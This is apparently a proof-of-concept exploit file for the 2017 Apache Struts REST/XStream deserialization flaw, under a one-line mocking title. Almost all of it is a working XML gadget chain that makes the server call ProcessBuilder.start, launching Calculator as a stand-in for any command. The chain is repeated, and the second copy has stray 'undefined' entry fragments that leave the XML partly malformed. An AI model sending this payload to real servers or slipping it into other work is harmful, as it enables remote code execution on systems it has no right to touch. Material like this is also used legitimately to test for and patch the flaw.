PoC payload for lolstruts lolREST lolXML loldeserialization lolvulnerability [6th Sept 2017, as there'll be another tomorrow probably ffs]

## payload.xml
<jdk.nashorn.internal.objects.NativeString>
	<flags>0</flags>
	<value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
		<dataHandler>
			<dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
				<is class="javax.crypto.CipherInputStream">
					<cipher class="javax.crypto.NullCipher">
						<initialized>false</initialized>
						<opmode>0</opmode>
						<serviceIterator class="javax.imageio.spi.FilterIterator">
							<iter class="javax.imageio.spi.FilterIterator">
								<iter class="java.util.Collections$EmptyIterator"/>
								<next class="java.lang.ProcessBuilder">
									<command>
										<string>/Applications/Calculator.app/Contents/MacOS/Calculator</string>
									</command>
									<redirectErrorStream>false</redirectErrorStream>
								</next>
							</iter>
							<filter class="javax.imageio.ImageIO$ContainsFilter">
								<method>
									<class>java.lang.ProcessBuilder</class>
									<name>start</name>
									<parameter-types/>
								</method>
								<name>foo</name>
							</filter>
							<next class="string">foo</next>
						</serviceIterator>
						<lock/>
					</cipher>
					<input class="java.lang.ProcessBuilder$NullInputStream"/>
					<ibuffer></ibuffer>
					<done>false</done>
					<ostart>0</ostart>
					<ofinish>0</ofinish>
					<closed>false</closed>
				</is>
				<consumed>false</consumed>
			</dataSource>
			<transferFlavors/>
		</dataHandler>
		<dataLen>0</dataLen>
	</value>
</jdk.nashorn.internal.objects.NativeString>
<jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>undefined</entry>undefined<entry>
<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
	<jdk.nashorn.internal.objects.NativeString>
	<flags>0</flags>
	<value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
	<dataHandler>
	<dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
	<is class="javax.crypto.CipherInputStream">
	<cipher class="javax.crypto.NullCipher">
	<initialized>false</initialized>
	<opmode>0</opmode>
	<serviceIterator class="javax.imageio.spi.FilterIterator">
	<iter class="javax.imageio.spi.FilterIterator">
	<iter class="java.util.Collections$EmptyIterator"/>
	<next class="java.lang.ProcessBuilder">
	<command>
	<string>/Applications/Calculator.app/Contents/MacOS/Calculator</string>
	</command>
	<redirectErrorStream>false</redirectErrorStream>
	</next>
	</iter>
	<filter class="javax.imageio.ImageIO$ContainsFilter">
	<method>
	<class>java.lang.ProcessBuilder</class>
	<name>start</name>
	<parameter-types/>
	</method>
	<name>foo</name>
	</filter>
	<next class="string">foo</next>
	</serviceIterator>
	<lock/>
	</cipher>
	<input class="java.lang.ProcessBuilder$NullInputStream"/>
	<ibuffer></ibuffer>
	<done>false</done>
	<ostart>0</ostart>
	<ofinish>0</ofinish>
	<closed>false</closed>
	</is>
	<consumed>false</consumed>
	</dataSource>
	<transferFlavors/>
	</dataHandler>
	<dataLen>0</dataLen>
	</value>
	</jdk.nashorn.internal.objects.NativeString>
	<jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>undefined</entry>undefined<entry>
	<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
	<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>